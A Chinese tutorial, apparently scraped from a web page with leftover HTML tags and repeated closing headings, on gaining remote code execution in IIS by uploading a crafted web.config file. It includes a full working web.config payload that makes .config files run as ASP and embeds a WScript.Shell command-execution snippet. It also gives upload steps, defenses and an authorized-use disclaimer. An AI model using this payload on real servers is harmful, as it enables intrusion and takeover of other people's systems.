利用web.config文件实现远程代码执行权限获取的教学文档<\/h1>

1. 漏洞背景与原理<\/h2>

1.1 web.config文件简介<\/h3>

web.config是ASP.NET Web应用程序的XML配置文件<\/li>
功能：存储应用程序配置信息（身份验证方式、数据库连接字符串、错误处理等）<\/li>

特点：

可出现在应用程序的每个目录中<\/li>
子目录继承父目录配置，也可通过自己的web.config覆盖父配置<\/li>

放置在根目录下影响整个网站，放置在其他目录下仅影响当前目录<\/li> <\/ul> <\/li> <\/ul>

1.2 漏洞成因<\/h3>

网站上传功能未严格限制web.config文件上传<\/li>
上传的web.config文件可配置IIS处理程序<\/li>

通过特殊配置可使.config文件被当作ASP脚本解析执行<\/li> <\/ul>

2. 前期侦察<\/h2>

2.1 服务器信息收集<\/h3>

探测方法：在URL中添加特殊字符如\/<><\/code>测试<\/li>
预期响应：ASP.NET默认会返回XSS过滤错误<\/li>

关键信息获取：

ASP.NET版本<\/li>
服务器头信息（如Server: Microsoft-IIS\/8.5<\/code>）<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 上传功能测试<\/h3>

测试上传不同后缀文件：

.aspx<\/code><\/li>
.asp<\/code><\/li>
.asmx<\/code><\/li>
<\/ul>
<\/li>
观察服务器返回的错误信息，了解上传限制机制<\/li>
<\/ul>
3. 漏洞利用步骤<\/h2>
3.1 构造恶意web.config文件<\/h3>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><configuration><\/span>
<\/span><\/span>  <system.webServer><\/span>
<\/span><\/span>    <handlers<\/span> accessPolicy=<\/span>"Read, Script, Write"<\/span>><\/span>
<\/span><\/span>      <add<\/span> name=<\/span>"web_config"<\/span> path=<\/span>"*.config"<\/span> verb=<\/span>"*"<\/span> modules=<\/span>"IsapiModule"<\/span> 
<\/span><\/span>           scriptProcessor=<\/span>"%windir%\system32\inetsrv\asp.dll"<\/span> 
<\/span><\/span>           resourceType=<\/span>"Unspecified"<\/span> requireAccess=<\/span>"Write"<\/span> preCondition=<\/span>"bitness64"<\/span> \/><\/span>
<\/span><\/span>    <\/handlers><\/span>
<\/span><\/span>    <security><\/span>
<\/span><\/span>      <requestFiltering><\/span>
<\/span><\/span>        <fileExtensions><\/span>
<\/span><\/span>          <remove<\/span> fileExtension=<\/span>".config"<\/span> \/><\/span>
<\/span><\/span>        <\/fileExtensions><\/span>
<\/span><\/span>        <hiddenSegments><\/span>
<\/span><\/span>          <remove<\/span> segment=<\/span>"web.config"<\/span> \/><\/span>
<\/span><\/span>        <\/hiddenSegments><\/span>
<\/span><\/span>      <\/requestFiltering><\/span>
<\/span><\/span>    <\/security><\/span>
<\/span><\/span>  <\/system.webServer><\/span>
<\/span><\/span>  <appSettings><\/appSettings><\/span>
<\/span><\/span><\/configuration><\/span>
<\/span><\/span><!--<% 
<\/span><\/span><\/span>Response.write("<\/p><pre>")
<\/span><\/span><\/span>Set wShell1 = CreateObject("WScript.Shell")
<\/span><\/span><\/span>Set cmd1 = wShell1.Exec("whoami")
<\/span><\/span><\/span>output1 = cmd1.StdOut.Readall()
<\/span><\/span><\/span>set cmd1 = nothing: Set wShell1 = nothing
<\/span><\/span><\/span>Response.write(output1)
<\/span><\/span><\/span>Response.write("<\/pre><p>")
<\/span><\/span><\/span>%>
<\/span><\/span><\/span><\/code><\/pre>3.2 关键配置解析<\/h3>


handlers配置<\/strong>：<\/p>

添加一个处理程序，使.config<\/code>文件由asp.dll<\/code>处理<\/li>
accessPolicy="Read, Script, Write"<\/code>：赋予读写和执行权限<\/li>
scriptProcessor<\/code>指向ASP脚本处理器路径<\/li>
<\/ul>
<\/li>

requestFiltering配置<\/strong>：<\/p>

移除对.config<\/code>扩展名的过滤<\/li>
移除对web.config<\/code>隐藏段的保护<\/li>
<\/ul>
<\/li>

ASP脚本部分<\/strong>：<\/p>

使用<% %><\/code>包含ASP代码<\/li>
通过WScript.Shell<\/code>执行系统命令<\/li>
示例中执行whoami<\/code>获取当前用户权限<\/li>
<\/ul>
<\/li>
<\/ol>
3.3 上传与执行<\/h3>

将构造好的web.config文件上传至目标服务器<\/li>
直接访问上传的web.config文件URL<\/li>
服务器会解析并执行其中的ASP代码<\/li>
命令执行结果会返回在响应中<\/li>
<\/ol>
4. 防御措施<\/h2>
4.1 上传限制<\/h3>

严格限制上传文件类型，禁止上传web.config<\/li>
使用白名单机制而非黑名单<\/li>
检查文件内容而不仅是扩展名<\/li>
<\/ul>
4.2 服务器配置<\/h3>

保持IIS和ASP.NET更新至最新版本<\/li>
配置requestFiltering严格限制.config文件访问<\/li>
设置适当的文件夹权限，限制上传目录的执行权限<\/li>
<\/ul>
4.3 其他措施<\/h3>

定期安全审计，检查服务器上的异常配置文件<\/li>
实施WAF规则阻止此类攻击<\/li>
最小权限原则运行Web应用程序<\/li>
<\/ul>
5. 扩展利用<\/h2>
成功利用此漏洞后，攻击者可：<\/p>

执行任意系统命令<\/li>
上传更多恶意文件建立持久后门<\/li>
进行内网横向移动（若服务器权限足够高）<\/li>
窃取敏感数据或破坏系统<\/li>
<\/ol>
6. 注意事项<\/h2>

此技术仅用于授权测试，未经授权使用属违法行为<\/li>
实际环境中可能需要根据目标服务器调整配置<\/li>
某些现代IIS版本可能已默认防范此类攻击<\/li>
测试后应及时提交详细报告并协助修复<\/li>
<\/ol>

利用web.config文件实现远程代码执行权限获取的教学文档<\/h1>

1. 漏洞背景与原理<\/h2>

2. 前期侦察<\/h2>

3. 漏洞利用步骤<\/h2>

4. 防御措施<\/h2>

6. 注意事项<\/h2> 此技术仅用于授权测试，未经授权使用属违法行为<\/li> 实际环境中可能需要根据目标服务器调整配置<\/li> 某些现代IIS版本可能已默认防范此类攻击<\/li> 测试后应及时提交详细报告并协助修复<\/li> <\/ol>

6. 注意事项<\/h2>

此技术仅用于授权测试，未经授权使用属违法行为<\/li>
实际环境中可能需要根据目标服务器调整配置<\/li>
某些现代IIS版本可能已默认防范此类攻击<\/li>
测试后应及时提交详细报告并协助修复<\/li> <\/ol>